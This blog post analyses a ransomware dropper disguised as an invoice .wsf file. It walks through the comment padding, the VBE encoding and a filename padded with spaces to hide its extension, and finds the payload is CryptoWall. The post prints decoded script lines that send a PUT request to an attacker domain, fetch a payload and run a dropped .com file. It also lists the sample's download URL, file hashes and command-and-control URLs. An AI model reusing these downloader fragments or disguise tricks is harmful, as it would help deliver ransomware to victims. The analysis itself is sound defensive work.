Wednesday, December 16, 2015

.wsf malware?

So i've stumbled upon something "new", a .wsf file , this is basically a fancy .vbs file.

URL to sample (as sent in the mail from threat actor, the usual invoice bull crap)
hXXps://www.mediafire.com/download/q1yqupocyigke3k/INVOICE_8329380DF.doc_.wsf
mirror: https://malwr.com/analysis/YWY2NjY3ZDhlYzUwNGI4ZGE4OTZhNzE4NjFiNDcwYTY/
MD5 70ca3b4d70f564348e2d3ba903e78b5e
SHA1 e5023bd075a47b6de994d4ea7c757fa7ce7fcbb4
SHA256 9c007e99407b961ad34baa86b017867f75628f28b642e37ea1635ee5b1aa83e6


Now if we open that file we will see in the first line and few hundreds following a gibberish text like this:
 
"/*Gelder Sunbelt Discontent Hookey Chared
Precipiced 
Infarct Hydrostatics ..."
 
This is basically one big comment that is meant for evasion from AV/analysts/ninjas...
After few more lines you will find the end of the comment, start of the .wsf file (job), and a new comment...
"Torquing*/
<job>
/*Teleph"
 
More blablabla and we will find the most interesting part:
"Eviscerates Franking Anesthesiology Shamefaced
Streetlight Floorings*/

#@~^Wl8AAA==&JytksAmAhmU$kL?kxL!(ybn1.m$4[:wXVmp:Ph\X}hUd} s-3Hs\-"
 
The string "#@~^" indicates that this is encrypted vbs (.vbe), i have encountered such before, but i have never actually could find a good working method to decode them, up until now.
A user named "Hackoo" at stack overflow posted this nice code that does the job perfectly
http://stackoverflow.com/questions/32882622/convert-vbs-encrypted-script-to-string
 
After we decode the .vbe we get some more gibberish, like this:
 
"if (!nAkTeFqOrAeRcwmTaBmAhangdYaVmLhHuExSkLgEedqGrGwSuCnHatiScgug.fileexists(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG+'\\qAcTyGsrkHlBagwS.doc')) {
//lPwCyOgfdAoXiflWaqeluLlDcGagxtrKaBbttMsIciwQgslGgXctbAlWmPmcmGfyyXsSbAnGavtDnEqTrEhyxMgZbBlEoQmLpBeShWuRhYkSbxxIuqpTrkmquSfAiRyDgibAhgrGgnmBwyxGuHkAaTbskrgOfUmFwMtmyGvIeHeQdVlytgqOrFuAfOpgrMiQoEqPaWqTaGcaeLgFdGkLkWxYngvKlanwyKbKtkktyUtxeAkYgYyEwimTomlagTcCpUeRmpqlkcaWgChAqVgGuRdZsHhBoBhFyAbObDnGyGxGcUcB
//agnXrHaNpCfKwOahkLiZnPmAufcPuAhbfbwnqPlLoOfpqGgDpRigbUpGdwmamBvazCgrzNgGhSwAagxKqvcucfxUdIoFsSvMdHdRmhiPpOkPcPrZsOtBqAqPpWhueVgUhMiWwOpLvUgWfEaKyigKwCpGePwZsMcZtupGvCzHuphGaElAnQemtgvZdMfurRaMwLhohRydbEkurKrGrVaUqdbVgtaKcFaymexPkRnclroHgLzQvBfFqwdAfGwLgZrDbAswtDlgrHegaZwkhUawdMmZrLhUhldoyQmRgAtEyRhSoVvFhqbWqMkcvEexzEsIcEhBeGtOflkFmdsdaPzYlbhTfWhkfRgQ
//gWytuPsKlhaZqAiwvLrCwYnAmFuOpGnihKdDlgcCrXtNuXzFdBbiaDtQgVfVvSgtqVrNdruFgOwQdWngpAaAqaeGgZvftLyzlGhDoYbdoZescppVoD
//hPpAwBiZmHbEynvxighIdqgObGvOhXcXaDpUgdyWxokZrFxBoXpFkWxupOzGrCpVgzoCgZkidCqVoGxFoGrUqFaqfTuFcOgAoFafkzyBlofKtBxogCgIyOsGrWtBiOfnpYlOcQwEyRvlyMsvbYnGdQqDhrxVfCvOzQ
//aEsHkVkRxDnVgRiqpWpBxevQtAcXaGyzmGaOiAytybmklWlGgExmyHwDkAqvdPlYyunTdBfWzruVhkxGalrVxOlMtbthvRkFmQfPmXaVkApHpQgMpygybUfYdgbOgWmAivnXuefBaTslahgYgGgHyZimuasTmasGkPlBgRqLuAnToZfGgtaSsSnakeovlOaxwqdsaPgSpRdtsIaSwyxGltfRbezSrfdCfgqDaZnYbakyaAgEbCbItruGgMdBdYsGxQfYsTncgPdCudaUoatVbFuQiYmAtAcYrNaNcblRdGwBlaoTqRiVgIcIvXfWoDfHoQvBoXdOpXiWcAuSrPqewNeUbEgDgntKfdoceyobqDaSpSuEaDpDwKylvEqCpWvcdTnYncyevCpGaHiTfBsYkGyBrfpIbDtIhFaBbYmYeCwGhGcHssgYipvKsMvTaXttgynQosgCgU
var  bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV=WScript.CreateObject('MSXML2.XMLHTTP');
bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.open('PUT','http://aolmessenger.su/update/check.php',false);
bQgadMaXdIiIfPuOyCpZfZxocXlLmZslmtgSbV.send();" 

Again, the threat actor using // comments to make the untrained eye to fail to find "http://aolmessenger.su/update/check.php"

So after removing the comments from the decrypted .vbe we end up with an easy .vbs file that connects to:
http://aolmessenger.su/update/check.php 
and
http://aolmessenger.su/update/info.doc
 
You think the threat actor finished with trying to fool us? Think again, here comes the most interesting stuff:
In sandbox analysis the .wsf file drops and .com (PE) and .doc file.
You can see that in the decoded .vbe strings:
"zHqnrMwaqnaHscsuvNsZyGkSetgTsMsywT.Exec(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\uarQrKkeoPnqnOgAgHfZ.com');
gUntydcFbSphhglgyWeNgDkZgYuNlBoDxm.SaveToFile(aIcNlbnOkdsItSgUnTihbIfcfBrGaakHgIfCiWwWdVfamwciqG + '\\qAcTyGsrkHlBagwS.doc');"

The .doc file is clean and it is a decoy to the .wsf file, the file that is saved is actually named "INVOICE_8329380DF.doc                                                                                                                                                                                                           .wsf"
So even if you have extensions enabled in view, all the blank spaces move the extension so you barely see it, and the user thinks that he opened a .doc file, so he expects a .doc file to be opened, which actually happens with this dummy file.

doc md5:  03dc2be6251417386887ed968482deb2

Now, check.php with PUT request in the .vbe caused to download .com file
But if you try to go to that URL yourself you will get this little fella:

x-mas.jpg - md5: b2d625408dfc0347e8202c9ccd36adbb
This nice x-mass greeting is in Russian (Хуй? пизда? джигурда!)
And the two words are common curse words, the 3rd one stumbled me and i have found the explanation for this phrase: https://www.youtube.com/watch?v=foodjSqrAh0
If you don’t know Russian that put the English captions, they are hilarious! 
So it looks like yet another method of keeping ninjas out, but i have the .com file from the sandbox analysis, maybe if i tried getting it with put like the .vbs or changing user agent i would get it as well.
So what is this final payload? Oh this is just cryptowall (4?)

md5: 908185de411e7e513535599540932caa

How do i know it is cryptowall? If your sandbox is good, the malware will decrypt files, delete shadow volume, and will create help_decrypt files that say welcome to the cryptowall family.

Every time i ran it i got different C&C, here are some:
elautech.com/dHgZQD.php?x=98xxxj2adv49w4q (212.172.221.11)
newtone.pl/dJE2Ok.php?g=98xxxj2adv49w4q (91.232.4.242)
shadowdent.ro/KqSF6e.php?w=8mbts9497st8rg (93.115.52.160)
hoffice.nu/t6mWjF.php?y=e08xpt0rx54jh (188.40.99.15)
frenchies.eu/ncgkiT.php?o=2qs3f6poq2h (62.210.178.117)
new-media-consulting.org/8rm6Sc.php?t=55oerfob715 (81.169.145.164)
enguzelilahiler.com/jwtfq9.php?f=yes6nej17cvj0r (178.32.234.11)

From quick search it looks like the C&C are compromised servers

The dropped files domain (aolmessenger.su) looks fairly new, and if you wasn’t sure the threat is Russian here is another nail to the coffin:
Looks like the actor wanted to verify his new domain is reachable 
and some registrant info:

No comments:

Post a Comment